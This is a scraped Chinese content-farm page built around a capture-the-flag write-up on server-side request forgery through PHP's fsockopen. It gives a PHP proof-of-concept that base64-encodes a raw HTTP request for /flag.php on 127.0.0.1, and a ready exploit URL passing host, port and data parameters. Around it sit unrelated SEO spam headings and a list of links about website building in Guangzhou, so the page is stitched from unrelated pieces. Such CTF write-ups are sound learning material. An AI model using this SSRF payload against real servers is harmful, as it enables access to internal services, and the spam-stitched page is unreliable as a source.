当前位置: 首页 > news >正文

建立自己的个人网站广州哪家做网站好

建立自己的个人网站,广州哪家做网站好,wordpress小工具友情链接,郴州市网站建设这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察 本题是需要我们去伪造一个ssrf的请求头去绕过 题目开始给了我们信息让我们去访问index.php fsockopen函数触发ssrf fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 bas…

这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察

本题是需要我们去伪造一个ssrf的请求头去绕过

题目开始给了我们信息让我们去访问index.php

fsockopen函数触发ssrf

fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。

通过了解知道fsockopen函数就要清楚有考察ssrf的意思,需要往这个方向去想

之后就是利用poc构建脚本

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80

之后就是构建url

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close

用base64加密然后构建url编码

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

http://www.sczhlp.com/news/108396/

相关文章:

  • 做塑胶网站需要什么提供网站建设设计外包
  • 上海专业网站建设公司怎么做网页截图
  • 设置网站默认首页php mysql网站开发实例教程
  • 网站做百度收录的意义网站流量少怎么做
  • 那个网站可以查询美做空基金辽宁城建设计院有限公司网站
  • 网站的主流趋势如何在网上卖自己的产品
  • 广州专业网站改版建站seo推广
  • 淘淘乐网站建设网络广告设计课程
  • 找别人做的淘客网站 会不会有问题js特效网站模板
  • 郑州企业网站快速优化价格开封市做网站的公司
  • wordpress做淘客网站设计类招聘网站
  • 网站建设全程揭秘光盘文件WordPress文章相似推荐
  • thinkphp 网站设置功能整站优化外包服务
  • asp.net做网站步骤wordpress比织梦好
  • 西安做网站哪家最便宜建筑工程公司取名免费
  • icp网站备案管理系统极简网站设计
  • 网站建设公司找哪家设计师的招聘要求
  • asp程序设计做网站怎么使用源码建网站
  • 网站开发概要设计模板狮山网站制作
  • 企业网站做app北京哪有建网站公司或个人的
  • 泉州百度网站推广两个网站 一个域名
  • 网站如何优化流程嘉兴市住房和城乡建设局网站
  • 网站模块在线制作教程精致网站赏析
  • wordpress网站商务通网站后台密码在哪里
  • 腾讯官方网站做书签自学设计的网站有哪些
  • 单仁做的网站试用网站如何做
  • 网站建设模块是什么极简wordpress模板
  • 四川展陈公司排名前十南宁网站建设优化服务
  • 河北省住房及城乡建设部网站海外域名注册商
  • 公司网站没备案注册一个空壳公司养着